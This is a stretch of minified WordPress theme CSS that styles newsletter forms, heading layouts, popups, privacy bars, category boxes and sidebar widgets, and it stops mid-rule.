.newsletter-box:not(.has-bg):not(.newsletter-box-2) { box-shadow: 0 0 30px var(--shadow-7); } .single .s-ct .newsletter-box { border: none; -webkit-box-shadow: none; box-shadow: none; } .newsletter-featured { flex: 0 0 15%; max-width: 15%; } .newsletter-box-2 .newsletter-featured { display: flex; justify-content: center; } .newsletter-content { flex: 0 0 30%; max-width: 30%; } .newsletter-inner > * { padding-right: 20px; padding-left: 20px; } .newsletter-form { flex: 0 0 55%; max-width: 55%; margin-left: auto; } .newsletter-form input[type='text'], .newsletter-form input[type='email'] { font-weight: 700; } .newsletter-form input[type='text']::placeholder, .newsletter-form input[type='email']::placeholder { font-weight: var(--input-fweight); } .newsletter-description { font-size: var(--rem-small); } .newsletter-content > *:not(:last-child) { margin-bottom: 10px; } .newsletter-box-2 .newsletter-inner { flex-flow: column nowrap; text-align: center; } .newsletter-box-2 .newsletter-inner > * { flex: 0 0 100%; width: 100%; max-width: 600px; margin-top: 0; margin-right: auto; margin-left: auto; } .newsletter-box-2 .newsletter-inner > *:not(:last-child) { margin-bottom: 20px; } .newsletter-box-2 .mc4wp-form-fields > * { justify-content: center; } .newsletter-sb-inner { padding: 20px; text-align: center; border: 2px dashed var(--flex-gray-15); } .newsletter-sb-inner > *:not(:last-child) { margin-bottom: 15px; } .newsletter-sb-featured img { margin-right: auto; margin-left: auto; } .newsletter-sb .mc4wp-form-fields > *:not(.agree-to-terms) { flex-flow: row wrap; justify-content: center; } .newsletter-sb .mc4wp-form-fields input[type='submit'] { margin-top: 15px; margin-left: 0; } .newsletter-sb .agree-to-terms { font-size: var(--meta-fsize); display: inline-block; margin-top: 20px; } .heading-inner { position: relative; display: flex; align-items: center; flex-flow: row nowrap; width: 100%; } .heading-layout-c1 .heading-inner, .heading-layout-c2 .heading-inner, .heading-layout-c6 .heading-inner, .heading-layout-c7 .heading-inner, .heading-layout-c9 .heading-inner, .heading-layout-c13 .heading-inner { justify-content: center; } .heading-title > * { position: relative; z-index: 1; color: var(--heading-color, inherit); } .heading-title a { -webkit-transition: var(--effect); transition: var(--effect); } .heading-title a:hover { opacity: .7; } .heading-tagline { line-height: 1; display: flex; align-items: center; flex-flow: row nowrap; margin-left: auto; color: var(--heading-tagline-color, inherit); } .heading-tagline a, .heading-tagline i { -webkit-transition: var(--effect); transition: var(--effect); } .heading-tagline a:hover, .heading-tagline a:hover + i { opacity: .7; } .heading-tagline-icon { margin-left: 4px; } [class *='heading-layout-c'] .heading-inner { flex-flow: row wrap; text-align: center; } [class *='heading-layout-c'] .heading-tagline { justify-content: center; width: 100%; margin-top: 12px; margin-right: auto; } .heading-layout-2 .heading-title:before, .heading-layout-c2 .heading-title:before, .heading-layout-c2 .heading-title:after { display: inline-flex; width: .6em; height: .6em; margin-right: 7px; content: ''; -webkit-border-radius: 100%; border-radius: 100%; background-color: var(--heading-sub-color, currentColor); } .heading-layout-c2 .heading-title:after { margin-right: 0; margin-left: 5px; } .heading-layout-3 .heading-inner, .heading-layout-c3 .heading-inner { border-bottom: 1px solid var(--flex-gray-15); } .heading-layout-c3 .heading-inner { padding-bottom: 15px; } .heading-layout-c3 .heading-inner:before { position: absolute; bottom: 0; left: 50%; width: 120px; margin-left: -60px; content: ''; border-bottom: 5px solid var(--heading-sub-color); } .heading-layout-c4 .heading-title, .heading-layout-c5 .heading-title { width: 100%; } .heading-layout-c3 .heading-title, .heading-layout-c4 .heading-title, .heading-layout-c5 .heading-title { text-align: center; } .heading-layout-3 .heading-title > * { display: inline-flex; padding-bottom: 10px; border-bottom: 5px solid var(--heading-sub-color); } .heading-layout-c3 .heading-title { width: 100%; } .heading-layout-4 .heading-inner, .heading-layout-c4 .heading-inner { padding-bottom: 10px; border-bottom: 4px solid var(--heading-sub-color, currentColor); } .heading-layout-4 .heading-inner:before, .heading-layout-c4 .heading-inner:before { position: absolute; top: auto; right: 0; bottom: 2px; left: 0; display: block; content: ''; border-bottom: 2px solid var(--heading-sub-color, currentColor); } .heading-layout-1 .heading-title, .heading-layout-c1 .heading-title, .heading-layout-6 .heading-title, .heading-layout-c6 .heading-title { line-height: 1; position: relative; display: inline-flex; padding: 0 12px; backface-visibility: hidden; } .heading-layout-1 .heading-title:after, .heading-layout-c1 .heading-title:after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; content: ''; -webkit-transform: skewX(-15deg); transform: skewX(-15deg); border-right: 3px solid var(--heading-sub-color); border-left: 3px solid var(--heading-sub-color); } .heading-layout-5 .heading-inner { width: 100%; padding-top: 7px; border-top: 5px solid var(--heading-sub-color); } .heading-layout-c5 .heading-inner { width: 100%; padding-top: 10px; border-top: 5px solid var(--heading-sub-color); } .heading-layout-6 .heading-title > *, .heading-layout-c6 .heading-title > *, .heading-layout-13 .heading-title > *, .heading-layout-c13 .heading-title > * { position: relative; z-index: 1; display: block; padding: 5px 20px; color: var(--absolute-white); } .heading-layout-6 .heading-title > *:after, .heading-layout-c6 .heading-title > *:after { position: absolute; z-index: -1; top: 0; right: 0; bottom: 0; left: 0; content: ''; -webkit-transform: skewX(-20deg); transform: skewX(-20deg); border-radius: var(--round-5); background-color: var(--heading-sub-color); } .heading-layout-13 .heading-title > *:after, .heading-layout-c13 .heading-title > *:after { position: absolute; z-index: -1; top: 0; right: 0; bottom: 0; left: 0; content: ''; border-radius: var(--round-5); background-color: var(--heading-sub-color); } .heading-layout-7 .heading-title > * { line-height: 1; display: inline-flex; padding-left: 7px; border-left: 7px solid var(--heading-sub-color); } .heading-layout-c7 .heading-title > *:before, .heading-layout-c7 .heading-title > *:after { display: inline-flex; width: 10px; height: 10px; margin-right: 10px; content: ''; background-color: var(--heading-sub-color); } .heading-layout-c7 .heading-title > *:after { margin-right: 0; margin-left: 10px; } .heading-layout-8 .heading-title > * { display: inline-flex; padding-left: 15px; } .heading-layout-8 .heading-title > *:before { position: absolute; z-index: -1; top: 0; bottom: 0; left: 0; display: block; width: 50%; content: ''; opacity: .5; background-color: var(--heading-sub-color, currentColor); } .heading-layout-c8 .heading-title { position: relative; display: inline-flex; margin-right: auto; margin-left: auto; } .heading-layout-c8 .heading-title:before, .heading-layout-c8 .heading-title:after { position: absolute; top: 50%; right: calc(100% + 10px); left: auto; width: 60px; height: 2px; margin-top: -1px; content: ''; background-color: var(--heading-sub-color, currentColor); } .heading-layout-c8 .heading-title:after { right: auto; left: calc(100% + 10px); } .heading-layout-9 .heading-title, .heading-layout-c9 .heading-title { position: relative; display: inline-flex; padding: 0 20px; } .heading-layout-9 .heading-title:before, .heading-layout-c9 .heading-title:before { position: absolute; top: 0; right: auto; bottom: auto; left: 0; width: 7px; height: 7px; content: ''; pointer-events: none; opacity: .5; border-top: 2px solid var(--heading-sub-color); border-left: 2px solid var(--heading-sub-color); } .heading-layout-9 .heading-title:after, .heading-layout-c9 .heading-title:after { position: absolute; top: auto; right: 0; bottom: 0; left: auto; width: 7px; height: 7px; content: ''; pointer-events: none; opacity: .5; border-right: 2px solid var(--heading-sub-color); border-bottom: 2px solid var(--heading-sub-color); } .heading-layout-c10 .heading-title, .heading-layout-c11 .heading-title { display: flex; justify-content: center; width: 100%; } .heading-layout-11 .heading-tagline, .heading-layout-c11 .heading-tagline { font-size: 3em; line-height: 1; position: absolute; top: auto; bottom: -7px; left: 0; margin: 0; pointer-events: none; opacity: .12; } .heading-layout-12 .heading-title, .heading-layout-c12 .heading-title { display: flex; align-items: center; flex-flow: row nowrap; } .heading-layout-12 .heading-title > *:before, .heading-layout-c12 .heading-title > *:before { line-height: 1; display: inline-flex; width: 1em; height: .6em; margin-right: 7px; content: ''; background-color: var(--heading-sub-color); } .heading-layout-c12 .heading-title { margin-right: auto; margin-left: auto; } .heading-layout-c12 .heading-title > *:after { line-height: 1; display: inline-flex; width: 1em; height: .6em; margin-left: 7px; content: ''; background-color: var(--heading-sub-color); } .heading-layout-12 .heading-inner, .heading-layout-c12 .heading-inner { width: 100%; padding-bottom: 7px; border-bottom: 5px solid var(--heading-color); } .heading-layout-c12 .heading-inner { padding-bottom: 12px; } /** footer slide up */ .f-slideup { position: fixed; z-index: 500; right: 0; bottom: 0; left: 0; -webkit-transition: -webkit-transform .4s var(--timing); transition: transform .4s var(--timing); -webkit-transform: translate3d(0, 100%, 0); transform: translate3d(0, 100%, 0); will-change: transform; } .yes-f-slideup .f-slideup { -webkit-transform: translate3d(0, 0, 0); transform: translate3d(0, 0, 0); } .slideup-inner { position: relative; -webkit-transition: opacity .4s var(--timing); transition: opacity .4s var(--timing); pointer-events: none; opacity: 0; background-color: var(--slideup-bg, #88888888); } .slideup-toggle { position: absolute; top: auto; right: 10%; bottom: 100%; left: auto; display: block; padding: 3px 15px; -webkit-transition: var(--effect); transition: var(--effect); color: var(--slideup-icon-na-color, var(--absolute-white)); border-top-left-radius: var(--round-5); border-top-right-radius: var(--round-5); background-color: var(--slideup-icon-na-bg, var(--g-color)); } body:not(.yes-f-slideup) .slideup-toggle:hover { box-shadow: 0 0 10px var(--slideup-icon-na-bg-90, var(--g-color-90)); webkit-box-shadow: 0 0 10px var(--slideup-icon-na-bg-90, var(--g-color-90)); } .yes-f-slideup .slideup-toggle { color: var(--slideup-icon-color, #fff); background-color: var(--slideup-bg, #88888888); } .slideup-toggle i { line-height: 1; display: block; -webkit-transition: var(--effect); transition: var(--effect); } .yes-f-slideup .slideup-toggle:hover i { -webkit-transform: rotate(180deg); transform: rotate(180deg); } .yes-f-slideup .slideup-inner { visibility: visible; pointer-events: auto; opacity: 1; } /** blocks */ .block-list-small-1 .scroll-holder { max-height: 410px; padding-right: 15px; } .cbox { position: relative; margin-bottom: var(--bottom-spacing); } .cbox-inner { position: relative; display: block; overflow: hidden; -webkit-transition: var(--effect); transition: var(--effect); border-radius: var(--wrap-border, var(--round-7)); background-color: var(--flex-gray-7); } .cbox-inner:hover { -webkit-box-shadow: 0 4px 10px var(--shadow-7); box-shadow: 0 4px 10px var(--shadow-7); } .cbox-body { position: relative; z-index: 10; display: flex; align-items: center; flex-flow: row nowrap; flex-grow: 1; padding: 10px 15px; } .cbox-body > * { pointer-events: auto; } .cbox-2 .cbox-body:before { position: absolute; z-index: -1; top: -30px; right: 0; bottom: 0; left: 0; content: ''; pointer-events: none; background-image: -webkit-linear-gradient(top, rgba(0, 0, 0, 0), var(--cbox-bg, var(--g-color-90))); background-image: linear-gradient(to bottom, rgba(0, 0, 0, 0) 0%, var(--cbox-bg, var(--g-color-90)) 100%); } .no-gradient .cbox-2 .cbox-body:before { background-image: -webkit-linear-gradient(top, rgba(0, 0, 0, 0), rgba(0, 0, 0, .9)); background-image: linear-gradient(to bottom, rgba(0, 0, 0, 0) 0%, rgba(0, 0, 0, .9) 100%); } .follow-button { font-size: 12px; display: flex; align-items: center; flex-shrink: 0; justify-content: center; width: 34px; height: 34px; -webkit-transition: var(--effect); transition: var(--effect); border: 1px solid var(--flex-gray-15); border-radius: 100%; } .follow-trigger:hover, .follow-trigger.followed { color: #62b088; border-color: #62b088; } .follow-trigger.in-progress { -webkit-transform-origin: center; transform-origin: center; -webkit-animation: reaction-spinner 1s linear infinite; animation: reaction-spinner 1s linear infinite; pointer-events: none; } .follow-trigger.in-progress i:before { content: '\e942'; } .follow-icon, .followed-icon { line-height: 32px; width: 100%; height: 100%; text-align: center; } .followed-icon, .followed i:not(.followed-icon) { display: none; } .followed i.followed-icon { display: block; } .cbox-content { flex-grow: 1; } .cbox-count { display: block; } .cbox-2 .cbox-count, .cbox-3 .cbox-count { color: var(--absolute-white); } .cbox-content > *:not(:last-child) { margin-bottom: 5px; } .cbox-featured, .cbox-featured-overlay { position: relative; display: block; overflow: hidden; width: 100%; padding-bottom: 66.67%; } .featured-category-img { position: absolute; z-index: 1; top: 0; right: 0; bottom: 0; left: 0; display: block; } .featured-category-img img { position: relative; display: block; width: 100%; height: 100%; object-fit: cover; -webkit-object-fit: cover; } .is-gap-none .cbox-title, .is-gap-none .cbox-count { padding-right: 10px; padding-left: 10px; } .cbox-follow .cbox-inner { display: flex; height: 100%; } .follow-redirect { display: flex; align-items: center; flex-flow: column nowrap; justify-content: center; width: 100%; height: 100%; } .cbox-center { margin-top: 5px; -webkit-transition: var(--effect); transition: var(--effect); -webkit-transform: translate3d(0, 15px, 0); transform: translate3d(0, 15px, 0); pointer-events: none; opacity: 0; } .cbox:hover .cbox-center { -webkit-transform: translate3d(0, 0, 0); transform: translate3d(0, 0, 0); opacity: 1; } .hover-ani-1 .cbox-overlay .p-url:hover { text-decoration-color: var(--absolute-white); } .is-light.follow-button { color: var(--absolute-white); border-color: var(--absolute-white); } .is-light.follow-button:hover { opacity: .5; color: var(--absolute-white); border-color: var(--absolute-white); } .cbox-3 .cbox-overlay:before { position: absolute; z-index: -1; top: 0; right: 0; bottom: 0; left: 0; width: 100%; height: 100%; content: ''; pointer-events: none; opacity: .6; background-color: var(--cbox-bg, var(--g-color)); } .no-gradient .cbox-3 .cbox-overlay:before { background-color: rgba(0, 0, 0, .6); } .cbox-3 .cbox-body { align-items: flex-start; flex-flow: column nowrap; justify-content: space-between; width: 100%; height: 100%; padding: 20px; } .cbox-3 .cbox-body > * { width: 100%; } .cbox-3 .follow-button { margin-left: auto; } .cbox-4 .cbox-featured { padding-bottom: 100%; } .cbox-4 .follow-button { position: absolute; z-index: 10; top: 20px; right: 20px; } .cbox-4 .cbox-content { text-align: center; } .cbox-4 .cbox-body { padding: 25px 20px; } .cbox-5 { text-align: center; --bottom-spacing: 12px; } .cbox-5 .cbox-inner { background-color: transparent; } .cbox-5 .cbox-inner:hover { display: none; } .cbox-featured-holder { position: relative; margin-right: auto; margin-left: auto; } .cbox-5 .cbox-featured { overflow: hidden; width: 100%; padding-bottom: 100%; -webkit-border-radius: 100%; border-radius: 100%; } .cbox-5 > *:not(:last-child) { margin-bottom: var(--bottom-spacing); } .cbox-featured-holder .follow-button { position: absolute; z-index: 1; top: 50%; left: 50%; display: inline-flex; margin-top: -17px; margin-left: -17px; text-shadow: 1px 2px 7px var(--flex-gray-15); } .block-covid-data { position: relative; } .block-covid-data svg.svg-virus { position: absolute; top: 0; right: 0; display: block; width: 70px; opacity: .07; } [data-theme='dark'] .block-covid-data svg, .light-scheme .block-covid-data svg { fill: #fff; } .block-covid-data .description-text { line-height: 1; display: flex; align-items: center; flex-flow: row nowrap; } .country-name { display: flex; margin-bottom: 15px; } .data-item { display: flex; align-items: center; width: 100%; } .data-item:not(:last-child) { margin-bottom: 7px; } .data-item-icon { margin-right: 7px; } .data-item svg { width: 1em; } .data-item-value { margin-right: 0; margin-left: auto; } .data-death .data-item-value { color: var(--g-color); } .ad-wrap, .amp-ad-wrap { line-height: 1; display: block; text-align: center; } .header-amp-ad, .footer-amp-ad { padding: 10px 20px; } .header-amp-ad { background-color: var(--flex-gray-15); } .ad-image { line-height: 0; display: inline-block; overflow: hidden; border-radius: var(--round-5); } .ad-description { line-height: 1; display: block; margin-bottom: 10px; text-align: center; } .block-h .heading-title { line-height: 1; margin-bottom: 0; } .heading-title i { margin-right: 5px; } .related-sec { display: block; width: 100%; padding: 20px; border-radius: var(--round-5); box-shadow: 0 5px 30px var(--shadow-7); } .entry-top .widget:not(:last-child), .entry-bottom .widget:not(:last-child) { margin-bottom: 35px; } .related-sec .block-h, .entry-widget .block-h { margin-bottom: 25px; } .related-sec .p-list-small-2 { align-items: center; margin-bottom: 20px; } .related-sec .p-list-small-2 .feat-holder { width: 100px; } .related-1 .p-list-small-2 { margin-bottom: 15px; padding-bottom: 15px; border-bottom: 1px solid var(--flex-gray-15); } .related-1 .p-list-inline:not(:last-child) { margin-bottom: 7px; padding-bottom: 7px; border-bottom: 1px solid var(--flex-gray-15) } .related-5 .p-wrap:not(:last-child) { margin-bottom: 12px; } .related-4 .p-wrap:not(:last-child) { margin-bottom: 5px; padding-bottom: 5px; border-bottom: 1px solid var(--flex-gray-15); } .entry-widget:not(:last-child) { margin-bottom: 30px; } .widget.entry-widget .related-sec { padding: 0; -webkit-box-shadow: none; box-shadow: none; } .privacy-bar { display: none; transition: opacity .25s var(--timing); -webkit-transform: opacity .25s var(--timing); opacity: 0; } .privacy-bar.activated { display: block; opacity: 1; } .privacy-bar.privacy-bottom { position: fixed; z-index: 970; bottom: 10px; left: 0; align-items: center; width: 100%; padding-right: 15px; padding-left: 15px; pointer-events: none; } .privacy-bar.privacy-left { position: fixed; z-index: 9999; top: auto; bottom: 20px; left: 20px; width: 380px; } .privacy-inner { font-size: var(--rem-mini); position: relative; display: flex; overflow: hidden; align-items: center; flex-flow: row nowrap; padding: 7px 20px; pointer-events: auto; color: var(--privacy-color); border-radius: var(--round-5); background-color: var(--privacy-bg-color, var(--dark-accent)); -webkit-box-shadow: 0 5px 15px var(--shadow-12); box-shadow: 0 5px 15px var(--shadow-12); } .privacy-bar.privacy-top { background-color: var(--privacy-bg-color, var(--dark-accent)); } .privacy-bar.privacy-top .privacy-inner { max-width: 1270px; margin-right: auto; margin-left: auto; background-color: transparent; -webkit-box-shadow: none; box-shadow: none; } .privacy-bar.privacy-left .privacy-inner { border-radius: var(--round-7); } .privacy-bar.privacy-bottom .privacy-inner { max-width: 720px; margin-right: auto; margin-left: auto; padding: 12px; } .privacy-content { flex-grow: 1; } .privacy-dismiss-btn { line-height: 1; display: flex; flex-shrink: 0; margin-left: 20px; padding: 5px 15px; } .privacy-bar.privacy-top .privacy-dismiss-btn:not(:hover):not(:focus) { background: var(--absolute-dark); } .privacy-dismiss-btn span { font-size: var(--em-mini); } .privacy-left .privacy-inner { margin-right: 0; margin-left: 0; padding: 15px; -webkit-box-shadow: 0 4px 30px var(--shadow-12); box-shadow: 0 4px 30px var(--shadow-12); } .privacy-inner a:not(.is-btn) { font-weight: 700; transition: var(--effect); -webkit-transform: var(--effect); color: inherit; text-decoration-line: underline; text-decoration-style: dotted; text-decoration-thickness: 1px; } .privacy-inner a:not(.is-btn):hover { color: var(--g-color); } .privacy-bar.privacy-left .privacy-dismiss-btn { padding: 10px 20px; } .saved-section { display: block; } .bookmark-section-header { position: relative; display: flex; align-items: center; flex-flow: row nowrap; } .saved-section .bookmark-section-header { padding-top: 25px; padding-bottom: 25px; } .blog-wrap.saved-content { margin-top: 0; } .bookmark-section-header-inner { position: relative; flex-grow: 1; } .bookmark-section-header-image { align-items: center; flex-shrink: 0; width: auto; height: 40px; margin-bottom: 10px; } .bookmark-section-header-image img { width: auto; max-height: 100%; } .bookmark-section-title, .bookmark-section-decs { display: block; } .bookmark-section-decs { margin-top: 5px; } .p-wrap.removing { display: none; } .empty-saved { margin-top: 25px; margin-bottom: 25px; } .empty-saved-desc { font-size: var(--rem-small); display: block; max-width: 500px; margin-top: 7px; } .interest-section .bookmark-section-header { padding: 20px 0; } .empty-saved-desc i { display: inline; color: var(--g-color); } .interest-content { margin-bottom: 30px; } .rec-section { display: block; overflow: hidden; background-color: var(--dark-accent); } .logo-popup-outer { display: flex; width: 100%; padding: 40px; pointer-events: auto; -webkit-border-radius: 10px; border-radius: 10px; background: var(--solid-white); -webkit-box-shadow: 0 10px 30px var(--shadow-12); box-shadow: 0 10px 30px var(--shadow-12); } [data-theme='dark'] .logo-popup-outer { background-color: var(--dark-accent); } .rb-user-popup-form { position: relative; max-width: 350px; margin: auto; } .logo-popup { width: 100%; } .login-popup-header { position: relative; display: block; margin-bottom: 25px; padding-bottom: 20px; text-align: center; } .login-popup-header:after { position: absolute; bottom: 0; left: 50%; display: block; width: 30px; margin-left: -15px; content: ''; border-bottom: 6px dotted var(--g-color); } .logo-popup-logo { display: flex; justify-content: center; width: auto; max-height: 80px; margin-bottom: 20px; } .logo-popup-logo img { display: block; object-fit: contain; } .user-form label { line-height: 1; display: block; margin-bottom: 10px; } .user-form form > *:not(:last-child) { margin-bottom: 15px; } .user-form input[type='text'], .user-form input[type='password'] { display: block; width: 100%; border-radius: var(--round-7); } .user-form .login-submit { padding-top: 7px; } .user-form input[type='submit'] { width: 100%; } .user-form-footer { line-height: 1; display: flex; flex-flow: row nowrap; justify-content: center; margin-top: 15px; } .user-form-footer a { -webkit-transition: var(--effect); transition: var(--effect); opacity: .7; } .user-form-footer > *:not(:last-child) { margin-right: 7px; padding-right: 7px; border-right: 1px solid var(--flex-gray-15); } .user-form-footer a:hover { text-decoration: underline; opacity: 1; color: var(--body-fcolor); text-decoration-color: var(--g-color); } .popup-newsletter { position: relative; width: 100%; max-width: 760px; margin: auto; } .popup-newsletter-inner { display: flex; overflow: hidden; flex-flow: row nowrap; width: 100%; border-radius: var(--round-7); -webkit-box-shadow: 0 10px 30px var(--shadow-12); box-shadow: 0 10px 30px var(--shadow-12); } .popup-newsletter-cover { display: flex; flex-shrink: 0; width: 40%; } .popup-newsletter-header > *:not(:first-child):not(.popup-newsletter-icon) { margin-top: 15px; } .popup-newsletter-cover-holder { position: relative; display: block; width: 100%; padding-bottom: 135%; background-color: var(--flex-gray-7); } .popup-newsletter .popup-newsletter-img { position: absolute; top: 0; right: 0; bottom: 0; left: 0; width: 100%; height: 100%; object-fit: cover; } .popup-newsletter-content { display: flex; flex-flow: column nowrap; flex-grow: 1; justify-content: space-evenly; padding: 40px; background-color: var(--dark-accent); } .popup-newsletter-content > * { position: relative; padding-top: 10px; padding-bottom: 10px; } .popup-newsletter-icon { position: absolute; top: 10px; right: 20px; pointer-events: none; opacity: .2; } .popup-newsletter-icon svg { width: 52px; } .popup-newsletter-description { font-size: var(--rem-small); color: var(--meta-fcolor); } .popup-newsletter-inner .mc4wp-form-fields input[type='submit'] { padding-right: 15px; padding-left: 15px; } .popup-newsletter-footer > * { opacity: .7; } .popup-newsletter-footer a { -webkit-transition: var(--effect); transform: var(--effect); } .popup-newsletter-footer a:hover { text-decoration: underline; opacity: 1; color: var(--body-fcolor); text-decoration-color: var(--g-color); } .close-popup-btn { padding: 0; cursor: pointer; background: none; box-shadow: none; touch-action: manipulation; } .close-icon { position: relative; display: block; overflow: hidden; width: 40px; height: 40px; pointer-events: none; } .close-icon:before, .close-icon:after { position: absolute; top: calc(50% - 1px); left: 30%; display: block; width: 40%; height: 2px; content: ''; -webkit-transition: var(--effect); transition: var(--effect); transform-origin: center center; opacity: .7; border-radius: 2px; background-color: currentColor; } .privacy-dismiss-btn:hover .close-icon:before, .privacy-dismiss-btn:hover .close-icon:after, .close-popup-btn:hover .close-icon:before, .close-popup-btn:hover .close-icon:after { transform: rotate(0deg); opacity: 1; } .close-icon:before { transform: rotate(45deg); } .close-icon:after { transform: rotate(-45deg); } .close-popup-btn { position: absolute; z-index: 9999; top: 0; right: 0; } #back-top { position: fixed; z-index: 980; right: 20px; bottom: 20px; display: block; cursor: pointer; -webkit-transition: all .5s var(--timing); transition: all .5s var(--timing); -webkit-transform: translate3d(0, 20px, 0); transform: translate3d(0, 20px, 0); text-decoration: none; pointer-events: none; opacity: 0; border: none; will-change: transform; } #back-top.scroll-btn-visible { -webkit-transform: translate3d(0, 0, 0); transform: translate3d(0, 0, 0); pointer-events: auto; opacity: 1; } #back-top.scroll-btn-visible:hover { -webkit-transform: translate3d(0, -5px, 0); transform: translate3d(0, -5px, 0); } #back-top i { font-size: 18px; line-height: 40px; display: block; width: 40px; height: 40px; -webkit-transition: var(--effect); transition: var(--effect); text-align: center; color: #fff; border-radius: var(--round-3); background-color: var(--dark-accent); } #back-top:hover i { background-color: var(--g-color); -webkit-box-shadow: 0 4px 15px var(--g-color-90); box-shadow: 0 4px 15px var(--g-color-90); } .amp-back-top { font-size: 1.5rem; line-height: 44px; display: block; width: 120px; height: 44px; margin-right: auto; margin-bottom: 10px; margin-left: auto; text-align: center; } .breadcrumb-inner { overflow: hidden; max-width: 100%; white-space: nowrap; text-overflow: ellipsis; } body.rtl .breadcrumb-inner { /*rtl:ignore*/ display: flex; } body.rtl .breadcrumb-inner > * { /*rtl:ignore*/ margin: 0 2px; } body.rtl .breadcrumb-inner > *:first-child { /*rtl:ignore*/ margin-right: 0; } .breadcrumb-inner .current-item, .breadcrumb-inner .last { opacity: .5; } .breadcrumb-absolute { position: absolute; top: 0; right: 0; left: 0; padding: 10px 15px; background-image: -webkit-linear-gradient(bottom, rgba(0, 0, 0, 0), rgba(0, 0, 0, .5)); background-image: linear-gradient(to top, rgba(0, 0, 0, 0) 0%, rgba(0, 0, 0, .5) 100%); } .breadcrumb-absolute .breadcrumb-inner .current-item { color: var(--absolute-light); } div.breadcrumb-absolute .breadcrumb-wrap { margin-bottom: 0; } .mc4wp-response { font-size: var(--rem-small); clear: both; margin-top: 10px; } .mc4wp-response a { font-weight: bold; text-decoration: underline; } .mc4wp-alert { color: #f8bc54; } .mc4wp-error { color: #ff3f43; } .mc4wp-notice { color: #42b8f3; } .mc4wp-success { color: #a1db9d; } .widget { position: relative; display: block; } .sidebar-inner .widget { clear: both; width: 100%; margin-bottom: 30px; } #wp-calendar { position: relative; width: 100%; margin-bottom: 7px; } #wp-calendar tfoot { position: absolute; top: 0; right: 0; left: 0; } #wp-calendar tfoot td { vertical-align: top; border: none; } #wp-calendar th, #wp-calendar td { line-height: 40px; padding: 0; text-align: center; } #wp-calendar tbody a { font-weight: 700; display: block; -webkit-transition: var(--effect); transition: var(--effect); text-decoration: none !important; } #wp-calendar tbody td { font-size: var(--rem-small); padding: 0; } #wp-calendar td#today { font-weight: 700; } .wp-calendar-nav a { font-size: var(--em-mini); -webkit-transition: var(--effect); transition: var(--effect); color: var(--meta-fcolor); } #wp-calendar tbody a:hover, .wp-calendar-nav a:hover, #wp-calendar td#today { color: var(--g-color); } #wp-calendar caption { font-size: var(--rem-small); font-weight: 700; margin-bottom: 7px; } #wp-calendar tfoot a:hover { text-decoration: underline; } .widget_tag_cloud .tagcloud, .wp-block-tagcoloroud { display: flex; display: -webkit-flex; flex-flow: row wrap; } .tagcloud a, .wp-block-tagcoloroud a { font-size: var(--dwidgets-fsize) !important; line-height: 1; margin: 2px; padding: 7px 10px; border: 1px solid var(--flex-gray-15); border-radius: var(--round-3); } .tagcloud a:hover, .wp-block-tagcoloroud a:hover { color: var(--absolute-white) !important; background-color: var(--g-color); -webkit-box-shadow: 0 0 10px var(--cat-highlight-90, var(--g-color-90)); box-shadow: 0 0 10px var(--cat-highlight-90, var(--g-color-90)); } .widget_pages .page_item, .widget_meta li, .cat-item, .widget_archive li, .widget.widget_nav_menu .menu-item, .sidebar-menu .menu-item { position: relative; display: block; } .cat-item:first-child a { padding-top: 0; } .cat-item:last-child a { padding-bottom: 0; } .widget_archive > ul > li:last-child, .cat-item:last-child, .widget_pages > ul > li:last-child, .widget_meta > ul > li:last-child, .widget.widget_nav_menu ul.menu > li:last-child, .sidebar-menu > li:last-child { margin-bottom: 0; } .widget.widget_nav_menu li:first-child a, .sidebar-menu li:first-child a { padding-top: 0; } .cat-item .children, .widget_pages .children { margin-top: 7px; margin-bottom: 7px; margin-left: 15px; padding: 0; } .widget:not(.woocommerce) .count { font-size: var(--rem-mini); line-height: 18px; float: right; min-width: 18px; padding: 0 3px; -webkit-transition: var(--effect); transition: var(--effect); text-align: center; color: var(--absolute-white); border-radius: var(--round-3); background-color: var(--dark-accent); } .widget_pages a, .widget_meta a, .cat-item a, .tagcloud a, .wp-block-tagcoloroud a, .widget_archive a, .widget.widget_nav_menu a, .copyright-menu a, .woocommerce-widget-layered-nav-list li, .sidebar-menu a { font-family: var(--dwidgets-family); font-size: var(--dwidgets-fsize); font-weight: var(--dwidgets-fweight); font-style: var(--dwidgets-fstyle); position: relative; display: block; padding-top: 5px; padding-bottom: 5px; -webkit-transition: var(--effect); transition: var(--effect); letter-spacing: var(--dwidgets-fspace); text-transform: var(--dwidgets-transform); color: inherit; } .widget_pages a:hover, .widget_meta a:hover, .cat-item a:hover, .widget_archive a:hover, .widget.widget_nav_menu a:hover, .copyright-menu a:hover, .sidebar-menu a:hover { color: var(--g-color); } .cat-item a:hover .count, .widget_archive a:hover .count { background-color: var(--g-color); } .widget_archive select, .widget_categories select { display: block; width: 100%; max-width: 100%; padding-left: 10px; } .widget_recent_comments .recentcomments { position: relative; margin-bottom: 20px; } .widget_recent_comments .recentcomments > a:last-child { font-family: var(--h4-family); font-size: var(--h4-fsize); font-weight: var(--h4-fweight); display: block; margin-top: 2px; margin-bottom: 0; } .widget_recent_entries li { font-family: var(--h5-family); font-size: var(--h5-fsize); font-weight: var(--h5-fweight); position: relative; display: block; margin-bottom: 15px; letter-spacing: var(--h5-fspace); } .widget_recent_entries li:before { font-family: 'ruby-icon'; font-size: 8px; font-weight: normal; display: inline; margin-right: .4em; content: '\e900'; -webkit-transition: var(--effect); transition: var(--effect); vertical-align: middle; border-radius: var(--round-3); } .widget_recent_entries li:hover:before { text-decoration: none; color: var(--g-color); background-color: currentColor; } .widget_recent_entries a, .recentcomments a, a.rsswidget { position: relative; -webkit-transition: var(--effect); transition: var(--effect); } .widget_recent_entries li:hover a, .recentcomments a:hover, a.rsswidget:hover { color: var(--g-color); } .widget_rss .widget-heading { display: flex; display: -webkit-flex; align-items: center; } .rss-widget-icon { display: none; } .widget_rss li { margin-bottom: 12px; padding-bottom: 12px; border-bottom: 1px dashed var(--flex-gray-15); } .widget_rss li:last-child { margin-bottom: 0; } .widget_rss ul a.rsswidget:before { font-family: 'ruby-icon'; font-size: var(--em-mini); position: relative; margin-right: 7px; content: '\42'; } .widget_rss ul a.rsswidget { font-family: var(--h4-family); font-size: var(--h4-fsize); font-weight: var(--h4-fweight); display: block; letter-spacing: var(--h4-fspace); } .rss-date { display: block; margin-top: 7px; } .rssSummary { font-size: var(--rem-small); display: block; margin-top: 12px; } .widget_rss cite { display: block; margin-top: 12px; } .widget_recent_comments > ul > .recentcomments:last-child, .widget_recent_entries > ul > li:last-child, .widget_rss > ul > li:last-child { margin-bottom: 0; padding-bottom: 0; border-bottom: none !important; } .textwidget br, 